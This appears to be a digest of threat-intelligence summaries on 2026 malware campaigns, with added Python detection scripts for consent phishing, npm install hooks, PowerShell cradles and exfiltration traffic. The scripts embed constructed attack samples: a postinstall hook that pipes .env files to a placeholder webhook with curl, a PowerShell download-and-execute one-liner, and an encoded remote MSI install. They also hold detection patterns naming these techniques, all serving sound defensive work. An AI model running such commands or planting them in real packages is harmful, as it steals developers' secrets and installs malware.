New TrickMo Variant: Device Take Over malware targeting Banking, Fintech, Wallet & Auth apps

A new variant of the TrickMo Android banking trojan was identified between January and February 2026. The change is a substantial redesign of the malware's platform rather than just a longer feature list: command-and-control has moved entirely onto The Open Network (TON), using .adnl endpoints instead of conventional internet infrastructure, so there is no ordinary domain or IP address for defenders to sinkhole. Active campaigns have targeted banking and wallet users in France, Italy, and Austria. Once the victim grants accessibility permissions, operators gain real-time control of the device, including credential phishing, keylogging, screen recording, SMS interception (which defeats SMS-delivered one-time codes), and bidirectional remote control. Added capabilities include network reconnaissance and SSH tunnelling, which turn infected devices into programmable network pivots and SOCKS5 proxy exit nodes: fraudulent sessions routed through the victim's own handset and IP address evade IP-based fraud detection, and the same tunnel gives operators a foothold in whatever network the device is connected to.

Pulse ID: 6a019c5f0a3344d92c4302a3
Pulse Link: https://otx.alienvault.com/pulse/6a019c5f0a3344d92c4302a3
Pulse Author: AlienVault
Created: 2026-05-11 09:07:43

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Android #Bank #BankingTrojan #CyberSecurity #Endpoint #France #InfoSec #Italy #Malware #OTX #OpenThreatExchange #Phishing #Proxy #RAT #RCE #SMS #SSH #Trojan #bot #socks5 #AlienVault

LevelBlue - Open Threat Exchange

Learn about the latest cyber threats. Research, collaborate, and share threat intelligence in real time. Protect yourself and the community against today's emerging threats.

LevelBlue Open Threat Exchange

Abuse of Cloud-Native Infrastructure in Modern Phishing Campaigns

An investigation has revealed a structural evolution in phishing operations: threat actors run entire campaigns through legitimate, enterprise-trusted cloud infrastructure rather than attacker-controlled systems. Adversaries weaponize the platforms employees use daily, including cloud storage, productivity suites, and OAuth authorization endpoints. Messages originate from legitimate Google or Microsoft systems, so they pass sender-authentication checks (SPF, DKIM, DMARC) and link only to allow-listed cloud services. Multi-factor authentication is bypassed without the password ever being entered: the victim completes a genuine OAuth consent flow, and the resulting token gives the attacker access in the victim's name. Victim organizations show no anomalous SIEM events at the time of compromise. Campaigns employ five stages: delivery via provider-owned infrastructure, payload hosting on legitimate cloud storage, execution within browser memory using native APIs, credential theft through legitimate authentication flows, and persistent presence through licensed services. Detection requires behavioral analysis rather than traditional indicators, as attackers operate enti...
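Because the consent grant itself is the compromise, the behavioural check the summary calls for is a review of OAuth consent events rather than a lookup of sender domains. The script below is an added example for this digest, not code from the pulse or its source report. The event schema (field names, app identifiers, sample values) is constructed for illustration; the scope names follow Microsoft Graph conventions, but the fields would have to be mapped onto whatever your identity provider's audit log actually exports.

```python
"""Review OAuth consent-grant events for signs of consent phishing.

Added example, not code from the pulse or its source. The event schema
below is constructed; map the fields onto your own audit-log export.
"""
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Delegated permissions that let a third-party app read mail or files, or
# hold a long-lived refresh token (offline_access). These are the scopes a
# consent-phishing app needs: once granted, the token works without the
# password or a second factor.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send",
    "Files.Read.All", "Files.ReadWrite.All",
    "MailboxSettings.ReadWrite", "offline_access",
}


@dataclass
class Finding:
    user: str
    app_id: str
    app_name: str
    reasons: List[str] = field(default_factory=list)


def assess_consent(event: dict, approved_app_ids: Set[str]) -> Optional[Finding]:
    """Return a Finding when a consent grant has the shape of consent phishing.

    Behavioural signals, none of which is a static indicator:
      * the app is not on the organisation's approved list
      * the publisher is not verified
      * the grant includes mail/file access or offline_access
      * the consent was granted by the end user, not an administrator
    A finding needs a high-risk scope plus at least one other signal, so an
    approved, verified app obtaining Mail.Read via admin consent stays quiet.
    """
    reasons: List[str] = []
    if event["app_id"] not in approved_app_ids:
        reasons.append("app not on approved list")
    if not event.get("publisher_verified", False):
        reasons.append("unverified publisher")
    risky = sorted(HIGH_RISK_SCOPES & set(event["scopes"]))
    if risky:
        reasons.append("high-risk scopes: " + ", ".join(risky))
    if event.get("consent_type") == "User":
        reasons.append("user-granted consent")
    if risky and len(reasons) >= 2:
        return Finding(event["user"], event["app_id"], event["app_name"], reasons)
    return None


def review(events: List[dict], approved_app_ids: Set[str]) -> List[Finding]:
    """Run assess_consent over a batch of events and keep the findings."""
    return [f for f in (assess_consent(e, approved_app_ids) for e in events) if f]


# Constructed sample events; not real telemetry.
APPROVED_APPS = {"app-approved-0001"}
SAMPLE_EVENTS = [
    # Normal: approved, verified app, admin consent.
    {"user": "alice@example.invalid", "app_id": "app-approved-0001",
     "app_name": "Corp Mail Archiver", "publisher_verified": True,
     "consent_type": "Admin", "scopes": ["Mail.Read", "User.Read"]},
    # Consent-phishing shape: unknown, unverified app, user consent,
    # mailbox access plus offline_access for a refresh token.
    {"user": "bob@example.invalid", "app_id": "app-unknown-7f3a",
     "app_name": "Invoice Viewer", "publisher_verified": False,
     "consent_type": "User", "scopes": ["Mail.ReadWrite", "offline_access", "User.Read"]},
    # Unknown app but only User.Read: little value to an attacker, no finding.
    {"user": "carol@example.invalid", "app_id": "app-unknown-11c2",
     "app_name": "Team Poll", "publisher_verified": False,
     "consent_type": "User", "scopes": ["User.Read"]},
]

if __name__ == "__main__":
    for f in review(SAMPLE_EVENTS, APPROVED_APPS):
        print(f"{f.user}: {f.app_name} ({f.app_id}) -> {'; '.join(f.reasons)}")
```

Requiring two signals keeps the rule quiet for approved integrations while still catching the case the summary describes: a user-granted consent to an unverified app that asks for mail access and a refresh token, none of which would show up as a failed login or a blocked URL.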

Pulse ID: 69fe0ae9bf660196169e557b
Pulse Link: https://otx.alienvault.com/pulse/69fe0ae9bf660196169e557b
Pulse Author: AlienVault
Created: 2026-05-08 16:10:17

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #Endpoint #Google #InfoSec #Microsoft #OTX #OpenThreatExchange #Password #Passwords #Phishing #RAT #Rust #Troll #Word #bot #AlienVault

CVE Alert: CVE-2026-6973 - Ivanti - Endpoint Manager Mobile - RedPacket Security

An Improper Input Validation in Ivanti EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1 allows a remotely authenticated user with administrative access

RedPacket Security

Four published versions of a fake "tanstack" package uploaded in 27 minutes that want to steal your .env files

An attacker registered the unscoped 'tanstack' name on npm and published four malicious versions (2.0.4-2.0.7) within 27 minutes on April 29, 2026. Each carried a postinstall hook, which npm runs automatically during npm install, that exfiltrated .env files and the credentials they hold. The attacker relied on name confusion with the legitimate @tanstack scope, under which widely used JavaScript libraries are published. The malicious code targeted .env files, stealing AWS keys, API tokens, database credentials, and OAuth secrets and sending them to an attacker-controlled Svix webhook endpoint. Version 2.0.6 was the most aggressive, sweeping every .env variant in the working directory. The version history shows the attacker debugging live, iteratively refining payload targeting and stealth while the package remained publicly available with approximately 19,830 monthly downloads.
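Both halves of this attack are checkable before anything runs: an unscoped name that collides with a well-known scope, and an install hook that reads .env files and talks to the network. The script below is an added example for this digest, not code from the pulse or from the tanstack maintainers. The manifests it inspects are constructed to mimic the described behaviour and are not the real payload; the helper names and the KNOWN_SCOPES list are assumptions for the illustration.

```python
"""Audit an npm package manifest for install-time scripts and scope-name confusion.

Added example, not code from the pulse or the project. The manifests
below are constructed; point audit_package at parsed package.json files
under node_modules, or at an unpacked tarball before installing.
"""
import re
from typing import Dict, List, Set

# Hooks npm runs automatically during `npm install`. `prepare` is omitted
# because ordinary packages use it legitimately for build steps.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Patterns that, inside an install hook, point at credential theft rather
# than at a build step such as `node-gyp rebuild`.
SUSPICIOUS = [
    (re.compile(r"\.env\b"), "touches .env files"),
    (re.compile(r"\b(curl|wget)\b"), "shells out to a downloader"),
    (re.compile(r"https?://"), "contacts a remote URL"),
    (re.compile(r"\bnode\s+-e\b"), "runs inline JavaScript"),
    (re.compile(r"\bbase64\b|fromCharCode|eval\("), "obfuscation or eval"),
]


def is_scope_confusion(name: str, known_scopes: Set[str]) -> bool:
    """True when an unscoped package name equals a well-known scope, e.g. the
    unscoped 'tanstack' sitting next to the legitimate @tanstack/* packages."""
    if name.startswith("@"):
        return False
    bare = {s.lower().lstrip("@") for s in known_scopes}
    return name.lower() in bare


def audit_package(pkg: Dict, known_scopes: Set[str]) -> List[str]:
    """Return human-readable findings for one parsed package.json."""
    findings: List[str] = []
    name = pkg.get("name", "<unnamed>")
    if is_scope_confusion(name, known_scopes):
        findings.append(f"{name}: unscoped name mirrors the @{name} scope (possible name confusion)")
    scripts = pkg.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
        if hits:
            findings.append(f"{name}: {hook} hook {', '.join(hits)}: {cmd!r}")
        else:
            findings.append(f"{name}: has {hook} hook, review manually: {cmd!r}")
    return findings


# Scopes worth protecting (assumed list); extend with what your projects use.
KNOWN_SCOPES = {"@tanstack", "@babel", "@types"}

# Constructed manifests, not the real packages.
IMPOSTOR = {
    "name": "tanstack", "version": "2.0.6",
    "scripts": {"postinstall": "node -e \"require('child_process').execSync("
                               "'cat .env .env.* 2>/dev/null | curl -s -X POST -d @- "
                               "https://hooks.example.invalid/ingest')\""},
}
LEGIT = {"name": "@tanstack/react-query", "version": "5.0.0", "scripts": {"build": "tsc"}}
NATIVE = {"name": "some-native-addon", "version": "1.0.0", "scripts": {"install": "node-gyp rebuild"}}

if __name__ == "__main__":
    for manifest in (IMPOSTOR, LEGIT, NATIVE):
        for line in audit_package(manifest, KNOWN_SCOPES):
            print(line)
```

The cheapest mitigation is to stop lifecycle scripts running at all on developer machines and in CI (`npm install --ignore-scripts`, or `npm config set ignore-scripts true`) and re-enable them only for the few native packages that genuinely need a build step; the audit above tells you which those are.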

Pulse ID: 69f9fed3a3c5ca9c78a875a9
Pulse Link: https://otx.alienvault.com/pulse/69f9fed3a3c5ca9c78a875a9
Pulse Author: AlienVault
Created: 2026-05-05 14:29:39

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AWS #CyberSecurity #Endpoint #InfoSec #Java #JavaScript #NPM #OTX #OpenThreatExchange #RAT #Troll #bot #developers #AlienVault

Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and macOS Backdoors

An ongoing campaign has been discovered delivering Linux and macOS backdoors through poisoned Python packages uploaded to the PyPI repository. The activity is attributed with medium confidence to Gleaming Pisces, a North Korean financially motivated threat actor affiliated with the Reconnaissance General Bureau. The campaign delivered PondRAT, identified as a lighter version of the known POOLRAT remote administration tool. Multiple malicious packages, including real-ids, coloredtxt, beautifultext, and minisound, were used to establish an evasive infection chain. The threat actor aims to compromise supply chain vendors through developer endpoints and ultimately reach their customers' systems. Code analysis reveals significant similarities between PondRAT and previously attributed Gleaming Pisces malware, including identical function names, encryption keys, and execution flows. Both Linux and macOS variants were identified, demonstrating the group's expanding cross-platform capabilities targeting the cryptocurrenc...

Pulse ID: 69f837f3d2d59a26f6d3acf3
Pulse Link: https://otx.alienvault.com/pulse/69f837f3d2d59a26f6d3acf3
Pulse Author: AlienVault
Created: 2026-05-04 06:08:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #CyberSecurity #DRat #Encryption #Endpoint #InfoSec #Korea #Linux #Mac #MacOS #Malware #NorthKorea #OTX #OpenThreatExchange #PyPI #Python #RAT #SupplyChain #bot #AlienVault

User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command

A ClickFix-style phishing campaign used social engineering to trick users into executing obfuscated PowerShell commands that downloaded and installed a malicious MSI payload from a remote server. The attack employed a multi-stage infection chain that used DLL sideloading with renamed legitimate binaries to execute malicious components. The final payload deployed HijackLoader to deliver a Lumma-style information stealer designed for credential harvesting and data exfiltration. The campaign used multiple command-and-control domains and infrastructure hosted on specific IP addresses. Mitigation measures include blocking the identified artifacts, raising user awareness of ClickFix social engineering, implementing endpoint detection for suspicious PowerShell activity and unsigned DLL sideloading, and isolating compromised systems for remediation.
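The detection opportunity in a ClickFix chain is the first step: what the victim pastes is a powershell.exe command line, often with an -EncodedCommand blob, that fetches and installs something remote. The script below is an added example for this digest, not code from the pulse or its source. It decodes the blob (base64 of UTF-16LE text) and scores both the outer command line and the decoded payload against download-cradle indicators. The command lines it triages are constructed (hosts under .invalid) and are not observed artifacts from the campaign.

```python
"""Decode and triage PowerShell command lines for ClickFix-style download cradles.

Added example, not code from the pulse or its source. Samples are
constructed. Feed triage() the CommandLine field from process-creation
telemetry (Sysmon event 1, Windows event 4688, or your EDR's equivalent).
"""
import base64
import re
from typing import Dict, Optional

# -EncodedCommand and its abbreviations; the payload is base64 of UTF-16LE text.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

INDICATORS = [
    (re.compile(r"\bmsiexec(?:\.exe)?\b.*?\s/i\s.*?https?://", re.I | re.S), "msiexec installing a remote MSI"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I), "download cradle"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-nop\b|-noprofile", re.I), "profile suppressed"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> Dict:
    """Score one command line. Indicators are matched on the outer command line
    with the base64 blob removed, plus the decoded payload, so flags on either count.
    Two or more indicators is treated as suspicious; one alone (e.g. -NoProfile)
    is common in legitimate administration."""
    decoded = decode_encoded_command(cmdline)
    text = ENC_FLAG.sub("", cmdline)
    if decoded:
        text += "\n" + decoded
    hits = [why for pat, why in INDICATORS if pat.search(text)]
    return {"decoded": decoded, "indicators": hits, "score": len(hits), "suspicious": len(hits) >= 2}


def encode_command(script: str) -> str:
    """Build an -EncodedCommand blob; used here only to construct a sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples, not observed command lines.
SAMPLES = [
    # ClickFix shape: hidden window, policy bypass, encoded remote MSI install.
    "powershell.exe -nop -w hidden -ep bypass -enc "
    + encode_command("msiexec /i https://update.example.invalid/setup.msi /qn"),
    # Classic one-liner cradle, no encoding.
    "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/a.ps1')\"",
    # Routine admin script: one weak indicator only.
    "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = triage(s)
        print(f"score={r['score']} suspicious={r['suspicious']} {r['indicators']}")
        if r["decoded"]:
            print("  decoded:", r["decoded"])
```

Run over process-creation telemetry, this flags the paste-and-run moment before the MSI lands, which is earlier in the chain than the DLL sideloading and HijackLoader stages the summary describes. The indicator list is deliberately behavioural (what the command does) rather than a list of the campaign's domains, which rotate.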

Pulse ID: 69f1de85544538ce8b03332a
Pulse Link: https://otx.alienvault.com/pulse/69f1de85544538ce8b03332a
Pulse Author: AlienVault
Created: 2026-04-29 10:33:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #Endpoint #HijackLoader #ICS #InfoSec #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SideLoading #SocialEngineering #bot #AlienVault

Multi-Stage Malware Execution Chain Analysis

A sophisticated multi-stage malware execution chain was discovered during proactive threat hunting activities using endpoint telemetry and dynamic analysis. The attack sequence demonstrates advanced techniques including script masquerading, defense evasion mechanisms, staged payload extraction, and establishment of command-and-control communications. The malware exhibits capabilities for downloading additional payloads, presenting risks of data exfiltration and lateral movement within compromised networks. Immediate network isolation of affected systems is critical, with full system reimaging strongly recommended to ensure complete removal of all malicious components. The investigation identified multiple malicious file hashes, a command-and-control IP address, and an associated domain used for maintaining persistent access to compromised environments.

Pulse ID: 69f1e236e4e192f639298d53
Pulse Link: https://otx.alienvault.com/pulse/69f1e236e4e192f639298d53
Pulse Author: AlienVault
Created: 2026-04-29 10:49:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #Endpoint #InfoSec #Malware #OTX #OpenThreatExchange #RAT #SMS #bot #AlienVault

Trigona Affiliates Deploy Custom Exfiltration Tool to Streamline Data Theft

Trigona ransomware affiliates have adopted a custom-developed exfiltration tool called uploader_client.exe in attacks observed during March 2026, marking a significant tactical evolution. This command-line utility features parallel data streams, connection rotation to evade network monitoring, and granular file filtering capabilities. The shift from commonly used off-the-shelf tools like Rclone to proprietary malware suggests attackers are attempting to maintain a lower profile during critical attack phases. Prior to data exfiltration, attackers deploy multiple security-disabling tools including HRSword, PCHunter, and various BYOVD utilities to terminate endpoint protection at the kernel level. Remote access is established through AnyDesk, while credential theft is conducted using Mimikatz and Nirsoft utilities. This custom tooling approach demonstrates a higher degree of technical maturity compared to typical ransomware affiliate operations.
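A custom uploader defeats hash- and filename-based blocking, but the traffic shape the summary attributes to it (parallel streams, connection rotation) is itself detectable. The script below is an added example for this digest, not code from the pulse or its source. It flags a single internal host that pushes a large outbound volume split across several distinct destinations in a short window with almost nothing coming back. The flow records are constructed (TEST-NET addresses) and the thresholds are assumptions to tune against your own baseline.

```python
"""Flag hosts whose outbound flows have the shape of staged bulk exfiltration.

Added example, not code from the pulse or its source. Flow records are
constructed; map the fields onto your NetFlow export or Zeek conn.log.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Flow:
    ts: int         # start time, epoch seconds
    src: str        # internal host
    dst: str        # external destination
    dport: int
    bytes_out: int  # client -> server
    bytes_in: int   # server -> client


def detect_exfil(flows: List[Flow],
                 min_bytes_out: int = 100 * 1024 * 1024,
                 min_distinct_dsts: int = 3,
                 min_out_in_ratio: float = 10.0,
                 max_span_s: int = 900) -> List[Dict]:
    """Return one record per source host meeting all four conditions.

    Volume alone also catches backups and sync clients; requiring several
    distinct destinations inside a short span isolates the connection-rotation
    pattern, and the out/in ratio separates uploads from ordinary browsing.
    """
    by_src: Dict[str, List[Flow]] = defaultdict(list)
    for f in flows:
        by_src[f.src].append(f)

    findings = []
    for src, fl in by_src.items():
        out = sum(f.bytes_out for f in fl)
        inbound = sum(f.bytes_in for f in fl)
        dsts = {(f.dst, f.dport) for f in fl}
        span = max(f.ts for f in fl) - min(f.ts for f in fl)
        ratio = out / max(inbound, 1)
        if (out >= min_bytes_out and len(dsts) >= min_distinct_dsts
                and ratio >= min_out_in_ratio and span <= max_span_s):
            findings.append({"src": src, "bytes_out": out, "distinct_dsts": len(dsts),
                             "out_in_ratio": round(ratio, 1), "span_s": span})
    return findings


MB = 1024 * 1024
T0 = 1_700_000_000  # arbitrary epoch base for the constructed data

# Constructed flows, not observed traffic.
SAMPLE_FLOWS = [
    # Workstation pushing ~240 MB across six rotating destinations in five minutes.
    *[Flow(T0 + 60 * i, "10.0.0.5", f"203.0.113.{10 + i}", 443, 40 * MB, 20 * 1024) for i in range(6)],
    # Ordinary browsing: small requests, large responses.
    Flow(T0 + 10, "10.0.0.7", "198.51.100.20", 443, 50 * 1024, 5 * MB),
    Flow(T0 + 70, "10.0.0.7", "198.51.100.21", 443, 30 * 1024, 2 * MB),
    # Backup server: large upload, but a single fixed destination.
    Flow(T0 + 5, "10.0.0.9", "192.0.2.50", 443, 500 * MB, 100 * 1024),
]

if __name__ == "__main__":
    for hit in detect_exfil(SAMPLE_FLOWS):
        print(hit)
```

The backup server in the sample shows why the distinct-destination condition matters: it moves more data than the workstation but to one fixed endpoint, which is what a sanctioned upload looks like. Pair this with alerts on the earlier stages the summary lists (HRSword, PCHunter and BYOVD drivers loading, AnyDesk installs, Mimikatz and Nirsoft execution), since by the time the uploader runs the affiliate already has the data staged.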

Pulse ID: 69ea2ebf9d87464f7c54c08e
Pulse Link: https://otx.alienvault.com/pulse/69ea2ebf9d87464f7c54c08e
Pulse Author: AlienVault
Created: 2026-04-23 14:37:51

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#AnyDesk #CyberSecurity #DataTheft #ELF #Endpoint #InfoSec #Malware #OTX #OpenThreatExchange #RAT #RansomWare #Rclone #Trigona #Word #bot #AlienVault

Crypto Drainers as a Converging Threat: Insights into Emerging Hybrid Attack Ecosystems

Cybercriminals are merging traditional malware operations with cryptocurrency-focused attacks, creating hybrid threat ecosystems. Modern crypto drainers have evolved into automated systems capable of extracting assets across multiple blockchains with minimal user interaction, supported by well-developed underground marketplaces offering drainer-as-a-service kits. Two case studies exemplify this convergence: StepDrainer operates as a multichain drainer-as-a-service platform that abuses Web3Modal and smart contract methods across over 20 blockchain networks, using AI-themed lures and polished interfaces to deceive victims into connecting wallets. EtherRAT represents a hybrid Windows implant delivered through trojanized TFTP installers, combining traditional RAT capabilities with blockchain-aware functionality including Ethereum RPC endpoints and embedded wallet addresses. Both threats demonstrate how cryptocurrency theft infrastructure now intersects with mainstream attack surfaces affecting enterprise envir...

Pulse ID: 69ea724596582ed94bc23acf
Pulse Link: https://otx.alienvault.com/pulse/69ea724596582ed94bc23acf
Pulse Author: AlienVault
Created: 2026-04-23 19:25:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BlockChain #CyberSecurity #Endpoint #InfoSec #Malware #Nim #OTX #OpenThreatExchange #RAT #RPC #Trojan #Web3 #Windows #bot #cryptocurrency #AlienVault

npm Packages Hit with TeamPCP-Style CanisterWorm Malware

npm packages associated with Namastex.ai were compromised and republished carrying malware whose tradecraft resembles TeamPCP's CanisterWorm campaign. The affected packages, including @automagik/genie and pgserve, gained install-time execution that harvests credentials, environment variables, SSH keys, cloud credentials, browser data, and crypto-wallet artifacts. The payload exfiltrates stolen data both to a conventional webhook at telemetry.api-monitor.com and to an Internet Computer Protocol canister endpoint. It incorporates self-propagation logic that uses stolen publishing tokens to compromise additional npm packages, and it includes cross-ecosystem spreading that targets PyPI. Exfiltrated data is protected with hybrid encryption, RSA wrapping an AES-256-CBC session key. Multiple package namespaces were affected, suggesting shared infrastructure or a coordinated compromise of publisher accounts.

Pulse ID: 69e8f5ba273a5389cb4d03f5
Pulse Link: https://otx.alienvault.com/pulse/69e8f5ba273a5389cb4d03f5
Pulse Author: AlienVault
Created: 2026-04-22 16:22:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #Cloud #CyberSecurity #ELF #Encryption #Endpoint #InfoSec #Malware #NPM #OTX #OpenThreatExchange #PyPI #RAT #SSH #Worm #bot #AlienVault
